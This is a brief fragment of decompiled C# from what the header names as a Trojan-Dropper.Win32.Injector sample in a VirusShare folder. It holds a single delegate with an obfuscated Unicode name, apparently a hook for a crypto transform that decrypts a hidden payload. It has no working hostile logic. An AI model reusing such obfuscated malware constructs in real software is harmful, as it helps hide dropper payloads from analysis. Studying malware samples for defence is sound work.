// Decompiled with JetBrains decompiler // Type: �䅿ꑼ谨뵵뛓莢 // Assembly: scan, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: C0A4408A-6830-4FA8-819B-3D801C5B54D7 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6.exe using System.Runtime.InteropServices; using System.Security.Cryptography; internal delegate ICryptoTransform \uE9F8\uFFFD䅿ꑼ谨뵵뛓莢( [In] object obj0, byte[] _param2, byte[] _param3);